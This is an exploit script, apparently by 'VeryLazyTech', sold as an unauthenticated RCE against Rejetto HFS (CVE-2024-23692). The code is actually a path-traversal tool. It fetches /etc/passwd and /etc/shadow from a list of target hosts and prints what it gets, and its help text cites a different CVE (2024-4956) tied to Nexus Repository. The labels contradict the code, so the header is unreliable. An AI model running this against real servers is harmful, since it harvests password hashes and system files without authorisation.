# Exploit Title: CVE-2024-23692: Unauthenticated RCE Flaw in Rejetto HTTP File Server
# Fofa Dork: "HttpFileServer" && server=="HFS 2.3m"
# Date: 2024-09-22
# Exploit Author: VeryLazyTech
# GitHub: https://github.com/verylazytech/CVE-2024-23692
# Vendor Homepage: http://rejetto.com/hfs/
# Software Link: http://rejetto.com/hfs/
# Version: 2.3m
# Tested on: Windows 10
# CVE: CVE-2024-23692
import requests
import random
import argparse
from colorama import Fore, Style
green = Fore.GREEN
magenta = Fore.MAGENTA
cyan = Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red = Fore.RED
blue = Fore.BLUE
yellow = Fore.YELLOW
white = Fore.WHITE
reset = Style.RESET_ALL
bold = Style.BRIGHT
colors = [green, cyan, blue]
random_color = random.choice(colors)
def banner():
banner = f"""{bold}{random_color}
______ _______ ____ ___ ____ _ _ _ _ ___ ____ __
/ ___\ \ / / ____| |___ \ / _ \___ \| || | | || | / _ \| ___| / /_
| | \ \ / /| _| __) | | | |__) | || |_ | || || (_) |___ \| '_ \
| |___ \ V / | |___ / __/| |_| / __/|__ _| |__ _\__, |___) | (_) |
\____| \_/ |_____| |_____|\___/_____| |_| |_| /_/|____/ \___/
__ __ _ _____ _
\ \ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__
\ \ / / _ \ '__| | | | | | / _` |_ / | | | | |/ _ \/ __| '_ \
\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |
\_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_|
|___/ |___/
{bold}{white}@VeryLazyTech - Medium {reset}\n"""
return banner
def read_ip_port_list(file_path):
with open(file_path, 'r') as file:
lines = file.readlines()
return [line.strip() for line in lines]
def make_request(ip_port, url_path):
url = f"http://{ip_port}/{url_path}"
try:
response = requests.get(url, timeout=5)
return response.text
except requests.RequestException as e:
return None
def main(ip_port_list):
for ip_port in ip_port_list:
for url_path in ["%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/passwd", "%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/shadow"]:
response_text = make_request(ip_port, url_path)
if response_text and "nexus:x:200:200:Nexus Repository Manager user:/opt/sonatype/nexus:/bin/false" not in response_text and "Not Found" not in response_text and "400 Bad Request" not in response_text and "root" in response_text:
print(f"Address: {ip_port}")
print(f"File Contents for passwd:\n{response_text}" if "passwd" in url_path else f"File Contents for shadow:\n{response_text}")
break
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=f"[{bold}{blue}Description{reset}]: {bold}{white}Vulnerability Detection and Exploitation tool for CVE-2024-4956", usage=argparse.SUPPRESS)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-u", "--url", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a URL or IP with port for vulnerability detection\n")
group.add_argument("-l", "--list", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a list of URLs or IPs for vulnerability detection\n")
args = parser.parse_args()
if args.list:
ip_port_list = read_ip_port_list(args.list)
print(banner())
main(ip_port_list)
elif args.url:
ip_port_list = [args.url]
print(banner())
main(ip_port_list)
else:
print(banner())
parser.print_help()